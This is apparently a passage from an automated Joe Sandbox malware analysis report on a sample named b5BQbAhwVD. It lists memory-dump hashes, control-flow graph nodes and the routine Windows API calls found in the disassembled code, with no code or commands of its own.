                                                                                                                  • Instruction Fuzzy Hash: 3281C674E00648CBEB14DFAAD940A9EBBF2BF88314F24D129E814BB355DB355942DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 28e1c0f7c181dc5aaec845b09547e42d8476d1fc4133c905daa39aeb128eeafe
                                                                                                                  • Instruction ID: 6bbe29bd2a4a5fe01db2931a6e58022ad1193b27e42882bc6673357a638de2dd
                                                                                                                  • Opcode Fuzzy Hash: 28e1c0f7c181dc5aaec845b09547e42d8476d1fc4133c905daa39aeb128eeafe
                                                                                                                  • Instruction Fuzzy Hash: A271A275D05628CFDB64DF6AC984BDDBBB2BF89301F1091AAD809A7350DB355A82CF40
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 06fde4a069ab4121f0830873dfe7d9306550f9c4c16ee98138f0fe27427d6e63
                                                                                                                  • Instruction ID: 9f0b9244afcb7a3d0ef01d0271d3188793aa1bba88e9e11ddde3238f0f04b1b9
                                                                                                                  • Opcode Fuzzy Hash: 06fde4a069ab4121f0830873dfe7d9306550f9c4c16ee98138f0fe27427d6e63
                                                                                                                  • Instruction Fuzzy Hash: D67187B5E016188FEB68CF66C944B9DFAF2BF88300F14C1AAD80DA7255DB345A85CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7a43e28569e45518c5dd0f1db90eb802f21dadae29079cd52de9e052727efd74
                                                                                                                  • Instruction ID: 6b8212444c301f11ede16191098b73edac6426d92d8d6b374a55835c2765b7a0
                                                                                                                  • Opcode Fuzzy Hash: 7a43e28569e45518c5dd0f1db90eb802f21dadae29079cd52de9e052727efd74
                                                                                                                  • Instruction Fuzzy Hash: 867195B5D056188FEB68CF6AC944B9DBBF2BF88300F14C1AAD40DA7255DB304A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7cc6b6e0f5f4313cf698779b1e4928f14707fc89c234f184308e62d23b207767
                                                                                                                  • Instruction ID: 2288bca28d7799c7affe616e284ae72b08d053653d2b3e30244fcd06f1ce42ac
                                                                                                                  • Opcode Fuzzy Hash: 7cc6b6e0f5f4313cf698779b1e4928f14707fc89c234f184308e62d23b207767
                                                                                                                  • Instruction Fuzzy Hash: 0361D738A0021ADFEB25DF64C854BADBBB6EB88300F1080A9991977755DF319D82EF54
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9d17040f9466a668e916431a79da0c88185875ca2147108e56b2aefd45bacff5
                                                                                                                  • Instruction ID: 3572972de2ca15ee34bc3e2e6e02511a4b17a8a70cb7f4900fff78c0399a6ea1
                                                                                                                  • Opcode Fuzzy Hash: 9d17040f9466a668e916431a79da0c88185875ca2147108e56b2aefd45bacff5
                                                                                                                  • Instruction Fuzzy Hash: 4A415FB1E016188BEB58CF67CD457DAFAF3AFC9300F14C1AAD50CA6264DB7509868F51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 83f926dac9c42f48f550f7426e285bc36e9c1dcc26dbd612b11bee32af78ca86
                                                                                                                  • Instruction ID: 405a1387ad436b158aa6aa2b5e24273433edb37292072adc8f118ef462c798ee
                                                                                                                  • Opcode Fuzzy Hash: 83f926dac9c42f48f550f7426e285bc36e9c1dcc26dbd612b11bee32af78ca86
                                                                                                                  • Instruction Fuzzy Hash: 91415BB1D016188BEB58CF6BCD457C9FBF3AFC9200F04C1AAD50CA6254DB740A858F55

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 157458-157946 75 15794c-15795c 0->75 76 157e98-157ecd 0->76 75->76 77 157962-157972 75->77 80 157ecf-157ed4 76->80 81 157ed9-157ef7 76->81 77->76 79 157978-157988 77->79 79->76 82 15798e-15799e 79->82 83 157fbe-157fc3 80->83 93 157f6e-157f7a 81->93 94 157ef9-157f03 81->94 82->76 84 1579a4-1579b4 82->84 84->76 86 1579ba-1579ca 84->86 86->76 87 1579d0-1579e0 86->87 87->76 89 1579e6-1579f6 87->89 89->76 90 1579fc-157a0c 89->90 90->76 92 157a12-157a22 90->92 92->76 95 157a28-157e97 92->95 99 157f91-157f9d 93->99 100 157f7c-157f88 93->100 94->93 101 157f05-157f11 94->101 110 157fb4-157fb6 99->110 111 157f9f-157fab 99->111 100->99 109 157f8a-157f8f 100->109 106 157f36-157f39 101->106 107 157f13-157f1e 101->107 112 157f50-157f5c 106->112 113 157f3b-157f47 106->113 107->106 119 157f20-157f2a 107->119 109->83 110->83 111->110 121 157fad-157fb2 111->121 117 157fc4-157fe6 112->117 118 157f5e-157f65 112->118 113->112 125 157f49-157f4e 113->125 126 157ff6 117->126 127 157fe8 117->127 118->117 122 157f67-157f6c 118->122 119->106 131 157f2c-157f31 119->131 121->83 122->83 125->83 130 157ff8-157ff9 126->130 127->126 129 157fef-157ff4 127->129 129->130 131->83
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360462919.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_150000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$.C]3$NC]3
                                                                                                                  • API String ID: 0-2504479211
                                                                                                                  • Opcode ID: c5bccf8623dd0eb77f992ab2a259b1f6943c5bd82b684ef3162e47d36387be99
                                                                                                                  • Instruction ID: 205f26858b5351bff82075f923b13b40350b5d3ed4fa44262375ba2499474d15
                                                                                                                  • Opcode Fuzzy Hash: c5bccf8623dd0eb77f992ab2a259b1f6943c5bd82b684ef3162e47d36387be99
                                                                                                                  • Instruction Fuzzy Hash: 39522134A0021DCFEB14DBA4C861B9EBB76EF85300F1081AAD51A7B3A5CF359E859F51

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 304 36270970-36270a0f GetCurrentProcess 309 36270a11-36270a17 304->309 310 36270a18-36270a4c GetCurrentThread 304->310 309->310 311 36270a55-36270a89 GetCurrentProcess 310->311 312 36270a4e-36270a54 310->312 314 36270a92-36270aaa 311->314 315 36270a8b-36270a91 311->315 312->311 326 36270aad call 36270f31 314->326 327 36270aad call 36270b4f 314->327 315->314 318 36270ab3-36270ae2 GetCurrentThreadId 319 36270ae4-36270aea 318->319 320 36270aeb-36270b4d 318->320 319->320 326->318 327->318
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 362709FE
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 36270A3B
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 36270A78
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 36270AD1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: e0ff3d7a0b30d71222c72dcdf007e4c9ed1b6f4cb73282e3ffa493627f3f4b2b
                                                                                                                  • Instruction ID: 1b61500854db13bb98432158b6dad207a67529391981be4d56eddc4ec7998f42
                                                                                                                  • Opcode Fuzzy Hash: e0ff3d7a0b30d71222c72dcdf007e4c9ed1b6f4cb73282e3ffa493627f3f4b2b
                                                                                                                  • Instruction Fuzzy Hash: EA5167B090030A8FEB04CFAAD544BDEBBF5EF88300F208459E519B7361DB749945CB66

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 328 36270980-36270a0f GetCurrentProcess 332 36270a11-36270a17 328->332 333 36270a18-36270a4c GetCurrentThread 328->333 332->333 334 36270a55-36270a89 GetCurrentProcess 333->334 335 36270a4e-36270a54 333->335 337 36270a92-36270aaa 334->337 338 36270a8b-36270a91 334->338 335->334 349 36270aad call 36270f31 337->349 350 36270aad call 36270b4f 337->350 338->337 341 36270ab3-36270ae2 GetCurrentThreadId 342 36270ae4-36270aea 341->342 343 36270aeb-36270b4d 341->343 342->343 349->341 350->341
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 362709FE
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 36270A3B
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 36270A78
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 36270AD1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: 4f0641fe52120b9cf6598bbfa903477d9ddcd62ffeb2bd12d555f3ce29e16ea0
                                                                                                                  • Instruction ID: 4c8d27bd0c81d2ba897a8db38d271fa6cadae9af1650c8eb8821c8cbdebadc14
                                                                                                                  • Opcode Fuzzy Hash: 4f0641fe52120b9cf6598bbfa903477d9ddcd62ffeb2bd12d555f3ce29e16ea0
                                                                                                                  • Instruction Fuzzy Hash: C75137B090070A8FDB04CFAAD544BDEBBF5EF88310F208459E519B7361DB749945CB66

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1342 362700b0-362700b8 1343 362700fd-36270176 1342->1343 1344 362700ba-362700ed 1342->1344 1346 36270181-36270188 1343->1346 1347 36270178-3627017e 1343->1347 1360 362700f0 call 36270104 1344->1360 1361 362700f0 call 362700b0 1344->1361 1362 362700f0 call 36270110 1344->1362 1348 36270193-36270232 CreateWindowExW 1346->1348 1349 3627018a-36270190 1346->1349 1347->1346 1352 36270234-3627023a 1348->1352 1353 3627023b-36270273 1348->1353 1349->1348 1350 362700f5-362700f6 1352->1353 1357 36270275-36270278 1353->1357 1358 36270280 1353->1358 1357->1358 1359 36270281 1358->1359 1359->1359 1360->1350 1361->1350 1362->1350
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36270222
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: 519bfa32a51aee31c509a4183411a41725c7d54a39aa6aeba0643a18b51585e8
                                                                                                                  • Instruction ID: 98115bca44b4755de987ea5edc62ef3ce0fa4ade4adb7dbc0f2815951f233455
                                                                                                                  • Opcode Fuzzy Hash: 519bfa32a51aee31c509a4183411a41725c7d54a39aa6aeba0643a18b51585e8
                                                                                                                  • Instruction Fuzzy Hash: 765102B5C10249EFDF01CF99C880ACEBFB6BF49300F25816AE918AB221D7719855CF90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1363 36270104-36270176 1364 36270181-36270188 1363->1364 1365 36270178-3627017e 1363->1365 1366 36270193-36270232 CreateWindowExW 1364->1366 1367 3627018a-36270190 1364->1367 1365->1364 1369 36270234-3627023a 1366->1369 1370 3627023b-36270273 1366->1370 1367->1366 1369->1370 1374 36270275-36270278 1370->1374 1375 36270280 1370->1375 1374->1375 1376 36270281 1375->1376 1376->1376
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36270222
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: 4eb98efdc8f4981de3f89158d407af598d502cb7ef5939b0970724937e3703cb
                                                                                                                  • Instruction ID: b458451fd5b79fca749fc957d0477eeef6e244d9f34090e735d557ade4b354b5
                                                                                                                  • Opcode Fuzzy Hash: 4eb98efdc8f4981de3f89158d407af598d502cb7ef5939b0970724937e3703cb
                                                                                                                  • Instruction Fuzzy Hash: 0651CEB5D10349DFDB14CFA9C884ADEBBB5BF88310F65822AE818AB211D7749845CF90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1377 36270110-36270176 1378 36270181-36270188 1377->1378 1379 36270178-3627017e 1377->1379 1380 36270193-36270232 CreateWindowExW 1378->1380 1381 3627018a-36270190 1378->1381 1379->1378 1383 36270234-3627023a 1380->1383 1384 3627023b-36270273 1380->1384 1381->1380 1383->1384 1388 36270275-36270278 1384->1388 1389 36270280 1384->1389 1388->1389 1390 36270281 1389->1390 1390->1390
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36270222
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: 60c2482e7cb83b98d32fcccd7b75c5d692c42ba0f1c9a0cc7df3091ee98ea054
                                                                                                                  • Instruction ID: 03ebdd816bc03eec681b08dbb6a965b010e69d72316009fcda2d914e26fc1717
                                                                                                                  • Opcode Fuzzy Hash: 60c2482e7cb83b98d32fcccd7b75c5d692c42ba0f1c9a0cc7df3091ee98ea054
                                                                                                                  • Instruction Fuzzy Hash: A341CFB5D10349DFDB14CF9AC880ADEBBB5BF48350F65812AE818AB211D7749845CF90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1391 36271dc0-36271dfc 1392 36271e02-36271e07 1391->1392 1393 36271eac-36271ecc 1391->1393 1394 36271e5a-36271e92 CallWindowProcW 1392->1394 1395 36271e09-36271e40 1392->1395 1400 36271ecf-36271edc 1393->1400 1397 36271e94-36271e9a 1394->1397 1398 36271e9b-36271eaa 1394->1398 1403 36271e42-36271e48 1395->1403 1404 36271e49-36271e58 1395->1404 1397->1398 1398->1400 1403->1404 1404->1400
                                                                                                                  APIs
                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 36271E81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallProcWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2714655100-0
                                                                                                                  • Opcode ID: 5b5668712fcca86a0f28b09de627b953d9cde0cacfa425abc9659b931c1fb07a
                                                                                                                  • Instruction ID: 591024c3fc43af72cfc80c84d0f8b9095c948849f01b4f1372b8a670201fab2e
                                                                                                                  • Opcode Fuzzy Hash: 5b5668712fcca86a0f28b09de627b953d9cde0cacfa425abc9659b931c1fb07a
                                                                                                                  • Instruction Fuzzy Hash: 02411AB8A10309CFDB14CF95C448E9AFBF5FF88314F258459E918AB321D734A941CBA0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1406 36270bc0-36270c5c DuplicateHandle 1408 36270c65-36270c82 1406->1408 1409 36270c5e-36270c64 1406->1409 1409->1408
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36270C4F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: 6cb0ef9dde946a15405b94e6de65159efdb63ac23e21f932ca40ac252b2030c9
                                                                                                                  • Instruction ID: 90941edff36fb8d1525ca0c8074e394514e829a5ee8431b1a82d9f58449ed313
                                                                                                                  • Opcode Fuzzy Hash: 6cb0ef9dde946a15405b94e6de65159efdb63ac23e21f932ca40ac252b2030c9
                                                                                                                  • Instruction Fuzzy Hash: 7621E6B5900209DFDB10CFAAD984ADEFBF8EF48310F24841AE958A3350D374A954CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1412 36270bc8-36270c5c DuplicateHandle 1413 36270c65-36270c82 1412->1413 1414 36270c5e-36270c64 1412->1414 1414->1413
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36270C4F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: a9c1f6daef284b7ef3b35df52e0c9709ba0313a39e1dca3a4715d6686bf81fb9
                                                                                                                  • Instruction ID: be4b5004b778a60ceb52dbda29999f59650847e62d631c36de3c9921bdeffb09
                                                                                                                  • Opcode Fuzzy Hash: a9c1f6daef284b7ef3b35df52e0c9709ba0313a39e1dca3a4715d6686bf81fb9
                                                                                                                  • Instruction Fuzzy Hash: B621E4B5900209DFDB10CFAAD984ADEFBF4EF48320F24801AE958A3350D374A954CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1433 3627e700-3627e703 1434 3627e708-3627e772 DispatchMessageW 1433->1434 1435 3627e774-3627e77a 1434->1435 1436 3627e77b-3627e78f 1434->1436 1435->1436
                                                                                                                  APIs
                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3627D92F), ref: 3627E765
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatchMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2061451462-0
                                                                                                                  • Opcode ID: 55430f6bd914146ac06216f4ad01f5112bd94929c56125911b5465fc435a41aa
                                                                                                                  • Instruction ID: 20198f385aa4dfa656c6cda7c3f4ac5d28b6c105f642e19a197b0fbd34047e5f
                                                                                                                  • Opcode Fuzzy Hash: 55430f6bd914146ac06216f4ad01f5112bd94929c56125911b5465fc435a41aa
                                                                                                                  • Instruction Fuzzy Hash: F111FEB5C04649CFDB10CFAAD944BCEFBF4AB48324F20851AD958B7251C378A544CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1428 36272018-3627208a SetTimer 1430 36272093-362720a7 1428->1430 1431 3627208c-36272092 1428->1431 1431->1430
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2870079774-0
                                                                                                                  • Opcode ID: 296ce88749bff96dbdc9edb3fd35f62a40435dc1c6cc4fcfde335ac95c9dc542
                                                                                                                  • Instruction ID: 94f54f6e519475f70de7b71500680d0abb625982ea505c1df22da8be07ccc3f8
                                                                                                                  • Opcode Fuzzy Hash: 296ce88749bff96dbdc9edb3fd35f62a40435dc1c6cc4fcfde335ac95c9dc542
                                                                                                                  • Instruction Fuzzy Hash: 1A11F5B580034ADFDB10CF9AD444BDEBBF8EB58320F208419D958B7210C375A584CFA5
                                                                                                                  APIs
                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3627D92F), ref: 3627E765
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatchMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2061451462-0
                                                                                                                  • Opcode ID: e1685a299e78ca26d03f78a7128a39c6338a3a0f77d8934ad37b33e6621e7612
                                                                                                                  • Instruction ID: e3f8f8819512495651096154379bd4e7c706235232f333d9ee4f77b0f5e9c41f
                                                                                                                  • Opcode Fuzzy Hash: e1685a299e78ca26d03f78a7128a39c6338a3a0f77d8934ad37b33e6621e7612
                                                                                                                  • Instruction Fuzzy Hash: 0C110FB5C046498FDB10CF9AD444BDEBBF4AB48224F10841AD958A7211C378A544CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1438 3627c560-3627d452 OleInitialize 1440 3627d454-3627d45a 1438->1440 1441 3627d45b-3627d478 1438->1441 1440->1441
                                                                                                                  APIs
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 3627D445
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: 3787e689ca49bcab9a77bfed01552854ca3d188444ea6be71a87506814b83477
                                                                                                                  • Instruction ID: 8a7d34f6d3de5d91881f68295b2821f47272bf168fb6591b8fb499636bd4be12
                                                                                                                  • Opcode Fuzzy Hash: 3787e689ca49bcab9a77bfed01552854ca3d188444ea6be71a87506814b83477
                                                                                                                  • Instruction Fuzzy Hash: EE1130B5900349CFDB10CFAAC444BCEBBF4EB48320F20881ADA18A7210C378A940CFA5
                                                                                                                  APIs
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 3627D445
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: 4af281ffae16c59ecbda46ef1a3f18267c226163675bd2519a88ba8443a41a47
                                                                                                                  • Instruction ID: 64cc8b7b97643edef2d639431d0af5737b357d550b2fcc1e5926cab4771526c1
                                                                                                                  • Opcode Fuzzy Hash: 4af281ffae16c59ecbda46ef1a3f18267c226163675bd2519a88ba8443a41a47
                                                                                                                  • Instruction Fuzzy Hash: B91115B5810249CFDB10CFAAD844BCEFBF4EB48320F208859D558A7210C378A544CFA5
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2870079774-0
                                                                                                                  • Opcode ID: b799f46d63cf41e04bc787309b22644a257c882cd3d802e6d01a1ea1ecab0744
                                                                                                                  • Instruction ID: 3cd6f4417a86a7597bf14953c3f7db5fefe07afcfc3b6b12089de6d05b82308b
                                                                                                                  • Opcode Fuzzy Hash: b799f46d63cf41e04bc787309b22644a257c882cd3d802e6d01a1ea1ecab0744
                                                                                                                  • Instruction Fuzzy Hash: 0211D3B5800349DFDB10CF9AD945BDEFBF8EB58320F208419D958A7211C375A584CFA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360462919.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_150000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 587518df63317b73c970f8503b094345d0e512092cb3d7ef2fe275793706e5de
                                                                                                                  • Instruction ID: f348765f18f25f5f8a13e97308c24feb812c9bb457f8b289a3a4b7f94c627bf0
                                                                                                                  • Opcode Fuzzy Hash: 587518df63317b73c970f8503b094345d0e512092cb3d7ef2fe275793706e5de
                                                                                                                  • Instruction Fuzzy Hash: 4142EAA7E1D7E18FC7124B705CB82597FB17B22106BEE458EC8C297287EBA54489C353
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360462919.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
